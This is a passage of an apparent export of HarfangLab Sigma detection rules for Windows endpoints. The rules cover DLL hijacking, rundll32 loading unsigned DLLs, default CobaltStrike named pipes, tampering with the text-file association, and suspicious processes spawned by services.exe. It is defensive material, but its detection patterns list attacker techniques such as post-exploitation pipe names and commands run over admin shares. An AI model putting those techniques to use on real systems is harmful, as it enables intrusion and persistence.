"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6673e47f-a4ed-4de4-928c-1d6b6f36f56a",
"rule_name": "DLL Hijacking via BDEUNLOCK.EXE.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BDEUNLOCK.EXE.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "676e902b-c810-4fde-b1d6-1fa958a5adb1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626153Z",
"creation_date": "2026-03-23T11:45:34.626155Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626159Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/florylsk/ExecIT/tree/master",
"https://attack.mitre.org/techniques/T1218.011"
],
"name": "t1218_011_rundll32_loads_unsigned_dll.yml",
"content": "title: Unsigned DLL Loaded by Rundll32 from Suspicious Folder\nid: 676e902b-c810-4fde-b1d6-1fa958a5adb1\ndescription: |\n Detects an unsigned DLL being loaded by \"rundll32.exe\" from an unusual folder.\n This can be an attempt to proxy malicious execution through the Microsoft signed binary \"rundll32.exe\".\n It is recommended to investigate the process that spawned \"rundll32.exe\", the loaded library and the processes spawned by \"rundll32.exe\".\nreferences:\n - https://github.com/florylsk/ExecIT/tree/master\n - https://attack.mitre.org/techniques/T1218.011\ndate: 2024/01/29\nmodified: 2026/01/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\rundll32.exe'\n ImageLoaded|startswith:\n - '?:\\Users\\'\n - '?:\\Windows\\Temp\\'\n - '?:\\Windows\\Tasks\\'\n\n filter_signed:\n Signed: 'true'\n\n exclusion_msi:\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI????.tmp'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\?\\MSI????.tmp'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI????.tmp-*\\\\*.dll'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI???.tmp-*\\\\*.dll'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI??.tmp-*\\\\*.dll'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\?\\MSI????.tmp-*\\\\*.dll'\n ImageLoaded|re: '(?i)^(?:[A-Z]:)(?:(?:\\\\Windows\\\\temp\\\\)|(?:\\\\Users\\\\[^\\\\]*\\\\appdata\\\\local\\\\temp\\\\))(?:[A-Z0-9]{1}\\\\)?(?:MSI[A-Z0-9]{1,4}\\.tmp)(?:-\\\\[^\\\\]*\\.dll)?'\n\n exclusion_custom_actions:\n # '?:\\Windows\\Temp\\_is????.tmp'\n # '?:\\Windows\\Temp\\_is????.tmp-\\CustomActions.dll'\n # '?:\\Windows\\Temp\\_is???.tmp-\\CustomActions.dll'\n # Same in appdata\\local\\temp folder\n ImageLoaded|re: '(?i)^(?:[A-Z]:)(?:(?:\\\\Windows\\\\temp\\\\)|(?:\\\\Users\\\\[^\\\\]*\\\\appdata\\\\local\\\\temp\\\\))(?:_is[A-Z0-9]{1,4}\\.tmp)(?:-\\\\CustomActions\\.dll)?'\n\n exclusion_custom_actions_dotnet:\n ProcessCommandLine|contains: '\\MSI????.tmp,zzzzInvokeManagedCustomActionOutOfProc Sfx'\n ImageLoaded:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\SFX*\\\\*.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\MSI????.tmp-\\\\*.dll'\n - '?:\\Users\\\\*\\Temp\\\\*\\SFX*\\\\*.dll'\n - '?:\\Users\\\\*\\Temp\\\\*\\MSI????.tmp'\n - '?:\\Users\\\\*\\Temp\\MSI????.tmp-\\\\*.dll'\n - '?:\\Windows\\Temp\\CustomActions.NET.CA.dll'\n - '?:\\Windows\\Temp\\CustomActions.NET.CA.dll-*\\\\*.dll'\n - '?:\\Windows\\Temp\\CustomActions.CA.dll-*\\\\*.dll'\n\n exclusion_evernote:\n ImageLoaded|startswith: '?:\\users\\\\*\\appdata\\local\\apps\\evernote\\evernote\\'\n\n exclusion_webex:\n ImageLoaded|startswith:\n - '?:\\users\\\\*\\appdata\\local\\webex\\webex64\\meetings\\'\n - '?:\\users\\\\*\\appdata\\local\\webex\\webex\\meetings\\x64\\'\n\n exclusion_netdrive:\n ImageLoaded: '?:\\users\\\\*\\netdrive2\\ex\\nd2ex.dll'\n\n exclusion_gotomeeting:\n ImageLoaded|endswith: '\\gotomeeting\\\\*\\uninshlp.dll'\n\n exclusion_install_navigator:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\\\*\\install navigator\\e_upwj01.dll'\n\n exclusion_httptousbridge:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\httptousbbridge\\x64\\brdifxapi64.exe'\n\n exclusion_diagonal_hook:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\[diagonal_hook_tmp]\\_dm_hook_????????.dll'\n\n exclusion_agent_wixsharp:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\msi????.tmp-\\agent wixsharp.exe'\n\n exclusion_viva:\n ImageLoaded: '?:\\users\\\\*\\appdata\\roaming\\viva_01.dll'\n\n exclusion_vmware:\n ImageLoaded: '?:\\windows\\temp\\rubrik_vmware*\\rbkvssprovider.dll'\n\n exclusion_dxcap:\n ImageLoaded:\n - '?:\\users\\\\*\\appdata\\local\\temp\\clickshare_*\\dxcap.dll'\n - '?:\\users\\\\*\\appdata\\local\\temp\\clickshare_*\\dxcap64.dll'\n\n exclusion_pkgutility:\n ImageLoaded: '?:\\windows\\temp\\{????????-????-????-????-????????????}\\{????????-????-????-????-????????????}\\pkgutility.dll'\n\n exclusion_interprocess:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\\\????????-????-????-????-????????????\\interprocessdll.x64.dll'\n\n exclusion_assembly:\n ImageLoaded|startswith: '?:\\Users\\\\*\\appdata\\local\\assembly\\'\n\n exclusion_ktoutlk:\n OriginalFileName: 'KTOutlk.DLL'\n\n exclusion_aepdu:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n\n exclusion_kerio:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Temp\\koffupdate{????????-????-????-????-????????????}\\\\*.dll'\n\n exclusion_bmc:\n ProcessCommandLine|contains: 'rundll32.exe IsolatedPluginHost.dll,IHInit AppSight.BlackBox.IsolatedPlugin.Isolated'\n\n exclusion_blackbox:\n ProcessCommandLine|endswith:\n - 'rundll32.exe DXCap.dll,DXCap_Hook'\n - 'rundll32.exe DXCap64.dll,DXCap_Hook'\n ImageLoaded|endswith:\n - '\\Black Box WHPS\\DXCap.dll'\n - '\\Black Box WHPS\\DXCap64.dl'\n\n exclusion_nch_software:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Roaming\\NCH Software\\Program Files\\FastFox\\ffhook64.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "676e902b-c810-4fde-b1d6-1fa958a5adb1",
"rule_name": "Unsigned DLL Loaded by Rundll32 from Suspicious Folder",
"rule_description": "Detects an unsigned DLL being loaded by \"rundll32.exe\" from an unusual folder.\nThis can be an attempt to proxy malicious execution through the Microsoft signed binary \"rundll32.exe\".\nIt is recommended to investigate the process that spawned \"rundll32.exe\", the loaded library and the processes spawned by \"rundll32.exe\".\n",
"rule_creation_date": "2024-01-29",
"rule_modified_date": "2026-01-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "67c99899-5e5d-4fd3-96a6-74eb3db90d9d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072940Z",
"creation_date": "2026-03-23T11:45:34.072942Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072946Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/"
],
"name": "t1021_002_default_cobaltstrike_named_pipes_creation.yml",
"content": "title: Default CobaltStrike Named Pipe Created\nid: 67c99899-5e5d-4fd3-96a6-74eb3db90d9d\ndescription: |\n Detects the creation of a named pipe pertaining to the CobaltStrike framework.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\ndate: 2022/07/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection_utilities:\n PipeName|endswith:\n # Cobalt Strike [3.x - 4.2]\n - '\\sshagent'\n - '\\portscan'\n - '\\keylogger'\n - '\\netview'\n - '\\screenshot'\n\n selection_msse:\n # Default cobalt are usually in the MSSE-???-server form\n # but have also been spotted with a smaller or higher number\n # of random chars, better make it generic to be sure\n PipeName|endswith: '\\MSSE-*-server'\n\n selection_other:\n # Startswith here allows to match all prefixes\n PipeName|startswith:\n - '\\msagent_'\n - '\\status_'\n - '\\postex_ssh_'\n - '\\postex_'\n - '\\interprocess_'\n - '\\samr_'\n - '\\netlogon_'\n - '\\srvsvc_'\n - '\\lsarpc_'\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "67c99899-5e5d-4fd3-96a6-74eb3db90d9d",
"rule_name": "Default CobaltStrike Named Pipe Created",
"rule_description": "Detects the creation of a named pipe pertaining to the CobaltStrike framework.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "67d6a3a7-1abe-47fe-acb8-674865f2c31e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076111Z",
"creation_date": "2026-03-23T11:45:34.076113Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076118Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md",
"https://www.ired.team/offensive-security/persistence/hijacking-default-file-extension",
"https://attack.mitre.org/techniques/T1546/001/"
],
"name": "t1546_001_change_default_file_association.yml",
"content": "title: Default Text File Association Changed in Registry\nid: 67d6a3a7-1abe-47fe-acb8-674865f2c31e\ndescription: |\n Detects the modification of the default program to open a text file in the registry.\n Attackers may establish persistence by setting the default program to open a specific file type to a malicious executable.\n This malicious executable is then started when a file presenting the extension is opened by a user.\n It is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md\n - https://www.ired.team/offensive-security/persistence/hijacking-default-file-extension\n - https://attack.mitre.org/techniques/T1546/001/\ndate: 2022/11/07\nmodified: 2026/01/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Other extensions could be added later\n TargetObject|contains:\n # This key usually contains 'txtfile', the handler for .txt extension\n - 'HKCR\\.txt\\(Default)'\n # the key HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command contains the path to the default binary to perform [action] on files with extension having the txtfile handler\n - 'HKCR\\txtfile\\shell\\\\*\\command'\n # Local config\n - 'HKU\\S*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.txt\\UserChoice\\ProdId'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_programfiles:\n Details|contains:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_openwith:\n ProcessImage|endswith: '\\openwith.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_notepad:\n TargetObject:\n - 'HKCR\\txtfile\\shell\\open\\command\\(Default)'\n - 'HKCR\\txtfile\\shell\\print\\command\\(Default)'\n - 'HKCR\\txtfile\\shell\\printto\\command\\(Default)'\n Details|contains:\n - '%SystemRoot%\\system32\\notepad.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n\n exclusion_ivanti:\n ProcessImage|endswith: 'EPSecurityService.exe'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Bitdefender'\n\n exclusion_txt:\n TargetObject: 'HKCR\\.txt\\(Default)'\n Details:\n - 'ASC.Txt'\n - 'txt'\n - 'txtfile'\n - 'txtfilelegacy'\n - 'Notepad++_file'\n - 'Text File'\n - 'UltraEdit.txt'\n - 'StoneFax.Print.Utility.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "67d6a3a7-1abe-47fe-acb8-674865f2c31e",
"rule_name": "Default Text File Association Changed in Registry",
"rule_description": "Detects the modification of the default program to open a text file in the registry.\nAttackers may establish persistence by setting the default program to open a specific file type to a malicious executable.\nThis malicious executable is then started when a file presenting the extension is opened by a user.\nIt is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-01-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "67db9973-8422-4d56-8bac-e2e8635979f9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096899Z",
"creation_date": "2026-03-23T11:45:34.096901Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096905Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.vonahi.io/srclient-dll-hijacking/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tiworker.yml",
"content": "title: DLL Hijacking via tiworker.exe\nid: 67db9973-8422-4d56-8bac-e2e8635979f9\ndescription: |\n Detects potential Windows DLL Hijacking via tiworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blog.vonahi.io/srclient-dll-hijacking/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tiworker.exe'\n ImageLoaded|endswith: '\\srclient.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "67db9973-8422-4d56-8bac-e2e8635979f9",
"rule_name": "DLL Hijacking via tiworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tiworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6805209d-4011-4732-a79a-ad1db5090d94",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094175Z",
"creation_date": "2026-03-23T11:45:34.094177Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094181Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1569_002_suspicious_service_binary.yml",
"content": "title: Suspicious Program Launched by services.exe\nid: 6805209d-4011-4732-a79a-ad1db5090d94\ndescription: |\n Detects suspicious programs being spawned by services.exe.\n Attackers may to create services remotely to move laterally on a network, they can also abuse the Windows Service Control Manager to execute malicious commands or payloads.\n It is recommended to check the legitimacy of the executed binary or script as well as to investigate the user responsible for this action to look for other malicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2020/11/13\nmodified: 2026/02/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.t1059.001\n - attack.t1059.003\n - attack.t1059.005\n - attack.t1059.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_parent:\n ParentImage: '?:\\Windows\\System32\\services.exe'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n selection_process:\n - Image|endswith:\n # cmd + scripts\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe' # maybe could lead to FP\n - '\\mshta.exe'\n - '\\pcalua.exe'\n # handle renamed binaries\n - OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n - 'RUNDLL32.EXE'\n - 'MSHTA.EXE'\n # No OriginalFileName for pcalua.exe\n - Description: 'Program Compatibility Assistant'\n Company: 'Microsoft Corporation'\n\n select_process_cmd_generic:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n filter_process_cmd_generic:\n CommandLine|startswith:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c ?:\\'\n\n select_process_cmd_specific:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains:\n - '\\cmd.exe /c ?:\\windows\\'\n - '\\cmd.exe /c ?:\\ProgramData\\'\n - '\\cmd.exe /c ?:\\PerfLogs\\'\n - '\\cmd.exe /c ?:\\temp\\'\n - '\\cmd.exe /c ?:\\users\\'\n - '\\cmd.exe /c ?:\\\\?Recycle.Bin\\'\n - '\\cmd.exe /c \\\\\\\\*\\C$\\'\n - '\\cmd.exe /c \\\\\\\\*\\ADMIN$\\'\n\n select_process_powershell_generic:\n - Image|endswith:\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - OriginalFileName:\n - 'PowerShell.EXE'\n - 'pwsh.dll' # related to pwsh.exe (PowerShell 6)\n filter_process_powershell_generic:\n CommandLine|startswith:\n - 'powershell.exe ?:\\'\n - 'powershell.exe *-File ?:\\'\n - 'powershell.exe *-Command ?:\\'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ?:\\'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe *-File ?:\\'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe *-Command ?:\\'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe ?:\\'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe *-File ?:\\'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe *-Command ?:\\'\n\n select_process_powershell_specific:\n Image|endswith:\n - '\\powershell.exe'\n - '\\pwsh.exe'\n CommandLine|contains:\n - 'powershell.exe ?:\\windows\\'\n - 'powershell.exe ?:\\ProgramData\\'\n - 'powershell.exe ?:\\PerfLogs\\'\n - 'powershell.exe ?:\\temp\\'\n - 'powershell.exe ?:\\users\\'\n - 'powershell.exe ?:\\\\?Recycle.Bin\\'\n - 'powershell.exe \\\\\\\\*\\C$\\'\n - 'powershell.exe \\\\\\\\*\\ADMIN$\\'\n - 'powershell.exe *-File ?:\\windows\\'\n - 'powershell.exe *-File ?:\\ProgramData\\'\n - 'powershell.exe *-File ?:\\PerfLogs\\'\n - 'powershell.exe *-File ?:\\temp\\'\n - 'powershell.exe *-File ?:\\users\\'\n - 'powershell.exe *-File ?:\\\\?Recycle.Bin\\'\n - 'powershell.exe *-File \\\\\\\\*\\C$\\'\n - 'powershell.exe *-File \\\\\\\\*\\ADMIN$\\'\n - 'powershell.exe *-Command ?:\\windows\\'\n - 'powershell.exe *-Command ?:\\ProgramData\\'\n - 'powershell.exe *-Command ?:\\PerfLogs\\'\n - 'powershell.exe *-Command ?:\\temp\\'\n - 'powershell.exe *-Command ?:\\users\\'\n - 'powershell.exe *-Command ?:\\\\?Recycle.Bin\\'\n - 'powershell.exe *-Command \\\\\\\\*\\C$\\'\n - 'powershell.exe *-Command \\\\\\\\*\\ADMIN$\\'\n\n exclusion_commandline:\n CommandLine:\n - '*acproxy.dll,PerformAutochkOperations*' # C:\\Windows\\system32\\rundll32.exe /d acproxy.dll,PerformAutochkOperations\n - '*aepdu.dll,AePduRunUpdate*' # C:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate\n - '*\\Windows\\system32\\silcollector.cmd*' # C:\\Windows\\system32\\cmd.exe /d /c C:\\Windows\\system32\\silcollector.cmd configure\n - '*srrstr.dll,ExecuteScheduledSPPCreation*' # C:\\Windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation\n - '*ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem*' # C:\\Windows\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\n - '*Startupscan.dll,SusRunTask*' # C:\\Windows\\system32\\rundll32.exe Startupscan.dll,SusRunTask (parent is svchost -k netsvcs)\n - '*\\Windows\\system32\\pla.dll,PlaHost *' # C:\\Windows\\system32\\rundll32.exe C:\\Windows\\system32\\pla.dll,PlaHost \"Server Manager Performance Monitor\" \"$(Arg0)\"\n # C:\\Windows\\system32\\cscript.exe /B /nologo C:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog Server Manager Performance Monitor 604800000 C:\\PerfLogs\\Admin\\ServerManager\\ $(Arg2)\n - '?:\\Windows\\system32\\cscript.exe /B /nologo ?:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog Server Manager Performance Monitor *'\n - 'rundll32.exe WSClient.dll,RefreshBannedAppsList'\n - '*\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog \"Server Manager Performance Monitor\"*' # C:\\Windows\\system32\\cscript.exe /B /nologo C:\\Windows\\system32\\calluxxprovider.vbs RemoveServerPerformanceLog \"Server Manager Performance Monitor\" 604800000 C:\\PerfLogs\\Admin\\ServerManager\\ $(Arg2)\n - '*Windows.Storage.ApplicationData.dll,CleanupTemporaryState*' # C:\\Windows\\system32\\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState\n - '?:\\windows\\system32\\rundll32.exe appraiser.dll,DoScheduledTelemetryRun'\n - 